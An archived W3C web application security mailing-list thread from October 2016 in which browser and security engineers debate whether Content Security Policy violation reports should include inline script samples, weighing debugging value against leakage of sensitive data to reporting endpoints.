- From: Brad Hill <hillbrad@gmail.com>
- Date: Wed, 19 Oct 2016 17:14:35 +0000
- To: Craig Francis <craig.francis@gmail.com>, Krzysztof Kotowicz <kkotowicz@gmail.com>
- Cc: Artur Janc <aaj@google.com>, Mike West <mkwst@google.com>, Devdatta Akhawe <dev.akhawe@gmail.com>, "public-webappsec@w3.org" <public-webappsec@w3.org>, Christoph Kerschbaumer <ckerschbaumer@mozilla.com>, Frederik Braun <fbraun@mozilla.com>, Scott Helme <scotthelme@hotmail.com>, Lukas Weichselbaum <lwe@google.com>, Michele Spagnuolo <mikispag@google.com>, Jochen Eisinger <eisinger@google.com>
- Message-ID: <CAEeYn8gZfUcrjD3S4O01xWrFAtcsq-EUe_dF--FYSBv=BkRCVw@mail.gmail.com>
Just to add my comment after discussion on today's teleconference: I'm sympathetic to the argument that "you must trust your reporting endpoint" for inline scripts and event handlers. I'm concerned about it for non-same origin external scripts. There are lots of "guarded" JSONP like endpoints that I imagine have PII in the first 40 chars, e.g., something like the following where u is a userid: for(;;);{u:21482823, ... Allowing any cross-origin endpoint to request this response and dump it to a reporting endpoint of their choice would be very bad. -Brad On Wed, Oct 19, 2016 at 8:21 AM Craig Francis <craig.francis@gmail.com> wrote: > On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote: > > URLs should not contain sensitive data, precisely because they are often > relayed to third parties > > > > Hi Krzysztof, > > While I agree, the classic example is a password reset. > > As in, a link is sent to the user via email, and that link contains a > sensitive token that allows someone to change the account password. > > That said, the token should not last long to deduce the risk of it being > exposed to 3rd parties (e.g. expiring it after use, or a certain period of > time). > > Craig > > > > > > > On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote: > > > > 2016-10-19 2:16 GMT+02:00 Artur Janc <aaj@google.com>: > > On Tue, Oct 18, 2016 at 10:05 AM, Mike West <mkwst@google.com> wrote: > > On Tue, Oct 18, 2016 at 1:03 AM, Artur Janc <aaj@google.com> wrote: > > On Mon, Oct 17, 2016 at 7:15 PM, Devdatta Akhawe <dev.akhawe@gmail.com> > wrote: > > Hey > > In the case of a third-party script having an error, what are example > leaks you are worried about? > > > The same kinds of issues that lead us to sanitize script errors for things > loaded as CORS cross-origin scripts: > https://html.spec.whatwg.org/#muted-errors. If the resource hasn't > opted-in to being same-origin with you, script errors leak data you > wouldn't otherwise have access to. > > > Thanks for the summary, Mike! It's a good overview of the issue, but I'd > like to expand on the reasoning for why including the prefix of an inline > script doesn't sound particularly scary to me. > > > Thanks for fleshing out the counterpoints, Artur! > > > Basically, in order for this to be a concern, all of the following > conditions need to be met: > > 1. The application has to use untrusted report collection infrastructure. > If that is the case, the application is already leaking sensitive data from > page/referrer URLs to its collector. > > > "trusted" to receive URLs doesn't seem to directly equate to "trusted" to > store sensitive data. If you're sure that you don't have sensitive data on > your pages, great. But you were also presumably "sure" that you didn't have > inline script on your pages, right? :) > > > Keep in mind that URLs are sensitive data for most applications and they > are currently being sent in violation reports. > > > URLs should not contain sensitive data, precisely because they are often > relayed to third parties in e.g. referrer. If they do, that's usually > considered a vulnerability by e.g. OWASP, especially if the URL is > capability bearing (IDOR > <https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References> > is even in OWASP Top 10). I agree that some applications disclose sensitive > information in URLs, but that's should not be the majority of them. I think > that for a lot of applications URLs reported through e.g. CSP violation > reports are still subject to regular access control, whereas we just don't > know yet if sensitive tokens are not included in script samples. It's > likely some IDs are present in the inline scripts <a href=# > oncllick=a.select(123)> > > > I'm having a difficult time imagining a case where an application is okay > with disclosing their URLs to a third-party for the purpose of debugging > violation reports, and is not okay with disclosing script prefixes for the > same purpose, given that: > 1) Almost all applications have sensitive data in URLs, compared to a > certainly real, but less specific risk of having inline scripts with > sensitive data in its prefix, assuming it's limited to a reasonable length. > > > Citation needed (for the "almost all" claim). I agree the risk of leaking > sensitive date might be mitigated by adding a reasonable length limit. > > > 2) URLs are disclosed much more frequently than script samples would be, > because they are sent with every report (not just "inline" script-src > violations). In the `referrer` field, the UA is also sending a URL of > another, unrelated page, increasing the likelihood that sensitive data will > appear in the report. > > > Which is why it's a best practice not to have sensitive data in URLs, but > instead e.g. using cookies or POST parameters to transfer them. > > > 3) There is no sanitization of URL parameters in violation reports, > compared to the prefixing logic we're considering for script samples. > > > In fact, I'd be much more worried about URLs than script prefixes, because > URLs leak on *any* violation (not just for script-src) and URLs frequently > contain PII or authorization/capability-bearing tokens e.g for password > reset functionality. > > > We've talked a bit about URL leakage in > https://github.com/w3c/webappsec-csp/issues/111. I recall that Emily was > reluctant to apply referrer policy to the page's URL vis a vis the > reporting endpoint, but I still think it might make sense. > > > 2. The application needs to have a script which includes sensitive user > data somewhere in the first N characters. FWIW in our small-scale analysis > of a few hundred thousand reports we saw ~300 inline script samples sent > by Firefox (with N=40) and haven't found sensitive tokens in any of the > snippets. > > > Yup. I'm reluctant to draw too many conclusions from that data, given the > pretty homogeneous character of the sites we're currently applying CSP to > at Google, but I agree with your characterization of the data. > > Scott might have more data from a wider sampling of sites, written by a > wider variety of engineering teams (though it's not clear that the terms of > that site would allow any analysis of the data). > > > I completely agree, this data is just what we had readily available -- we > can certainly do a much larger analysis of script prefixes based on the > search index. That said, if we're worried about the script-sample approach, > perhaps not seeing any sensitive data in the first dataset we looked at > could be a signal that it's worth pursuing further. > > 3. The offending script needs to cause a CSP violation, i.e. not have a > valid nonce, meaning that the application is likely broken if the policy is > in enforcing mode. > > > 1. Report mode exists. > > 2. Embedded enforcement might make it more likely that XSS on a site could > cause policy to be inadvertantly applied to itself or its dependencies. We > talked about this briefly last week, and I filed > https://github.com/w3c/webappsec-csp/issues/126 to ponder it. :) > > > Since CSPs applied by embedded enforcement serve a very different purpose > than current policies (they don't try to mitigate script injection), it > would very likely be okay to just not include script-sample data for such > policies. Also, embedded enforcement is still pretty far off, and the > reporting problem is an issue for pretty much every site currently > gathering violation reports; we should probably weigh the value of fixing > CSP reporting accordingly. > > > As a security engineer, I would consider #1 to be the real security > boundary -- a developer should use a CSP collector she trusts because > otherwise, even without script-sample, reports contain data that can > compromise the application. > > > That sounds like an argument for reducing the amount of data in reports, > not for increasing it. I think it's somewhat rational to believe that > reporting endpoints are going to have longer retention times and laxer > retention policies than application databases. Data leaking from the latter > into the former seems like a real risk. I agree that the URL itself already > presents risks, but I don't understand how that's a justification for > accepting more risk. > > > It is an argument for using trusted infrastructure when building your > application ;-) Developers are already accustomed to deciding whether to > place trust in various components of their apps, whether it's the hosting > platform and OS, server-side modules and libraries, or JS widgets and other > embedded resources. A CSP violation endpoint is currently a > security-critical part of an application because it receives URLs; people > who don't trust their collection infrastructure already have insecure > applications and adding script-sample to reports does little to change > this. (Note that this wouldn't hold for applications which have nothing > sensitive in URLs and embed sensitive data at the beginning of inline > scripts, but this doesn't seem like a common pattern.) > > Basically, the reluctance to include relevant debugging information in the > violation report seems to be somewhat of a misplaced concern to me, because > it ignores the trust relationship the application owner must already have > with their report collection endpoint. > > Perhaps it's pertinent to take a step back and think about the reason to > have reporting functionality in CSP in the first place -- after all, the > mechanism could certainly work only via throwing SecurityPolicyViolation > events and requiring developers to write their own logging code. The fact > that this capability exists in UAs, and is not restricted to sending > reports to the same origin or same "base domain" (contrary to the original > proposals, e.g. in http://research.sidstamm.com/papers/csp-www2010.pdf) > indicates that CSP wants to be flexible and give developers ultimate > control over the reporting functionality. Given this design choice, it > seems okay to trust the developer to pick the right report URI for their > application and include useful debugging data if the developer wants it; in > a way, the status quo is the worst of both worlds, because it already > requires the developer to fully trust the collector, but doesn't give her > enough useful data to track down causes of violations. > > In case it helps: Lukas ran a quick analysis of the report-uri values > we've seen in the wild, and e.g. for the domains with CSP in Alexa 100,000 > we see the following: > - 49% don't set a report-uri > - 29% have a report-uri pointing to a relative path (/foo) > - 10% have a report-uri pointing to the same origin, with another 1% using > a sibling subdomain (foo.example.org reporting to csp.example.org) > > Out of the remaining ~10% which send violations to external URLs, about > half point to report-uri.io and a couple of other logging services, and > the rest seems to use another domain owned by the same person/organization, > e.g. vine.co sends reports to twitter.com. The data for all domains in > our set isn't substantially different (66% without report-uri; 24% > reporting to own domain; 10% externally). This data doesn't include all the > Google ccTLDs and a couple of other big providers, and I'm sure it's > missing some other domains, e.g. ones with CSP in parts of the site > requiring authentication, but AFAIK it shouldn't have a systematic bias > otherwise. > > I can easily imagine scripts that violate conditions #2 and #3, but at the > same time we have not seen many examples of such scripts so far, nor have > people complained about the script-sample data already being included by > Firefox (AFAIK). > > > People are generally unlikely to complain about getting more data, > especially when the data's helpful and valuable. That can justify pretty > much anything, though: lots of people think CORS is pretty restrictive, for > instance, and probably wouldn't be sad if we relaxed it in various ways. > > > Overall, I don't see the gathering of script samples as qualitatively > different to the collection of URLs. However, if we are indeed particularly > worried about script snippets, we could make this opt-in and enable the > functionality only in the presence of a new keyword (report-uri /foo > 'report-script-samples') and add warnings in the spec to explain the > pitfalls. This way even if I'm wrong about all of the above we would not > expose any data from existing applications. > > > I suspect that such an option would simply be copy-pased into new > policies, but yes, it seems like a reasonable approach. > > > For some background about why we're even talking about this: currently > violation reports are all but useless for both debugging and detection of > the exploitation of XSS due to the noise generated by browser extensions. > > > I agree that this is a problem that we should solve. One way of solving it > is to add data to the reports. Another is to invest more in cleaning up the > reports that you get so that there's less noise. I wish browser vendors > (including Chrome) spent more time on the latter, as we're actively harming > users by not doing so. > > > Yes, fixing the blocking and reporting of extension-injected scripts would > certainly help (although note that "less noise" likely isn't sufficient, it > really has to be zero noise), but IIRC prior discussions we've had about > the topic indicated that this is an almost intractable problem, so it would > be great to find alternative solutions. > > The script sample approach also has several important advantages because > even without extension-related false positives, developers would have very > little information about the actual cause of inline script violations > (which are the majority of possible CSP problems in nonce-based policies). > Sending some of the script text not only makes it possible to discard all > spurious reports, but also gives the developer the crucial bit of data to > find and fix actual site errors; it seems like a workable solution to the > current reporting problems faced by many sites. > > Cheers, > -Artur > > > > > -- > Best regards, > Krzysztof Kotowicz > > >
Received on Wednesday, 19 October 2016 17:15:18 UTC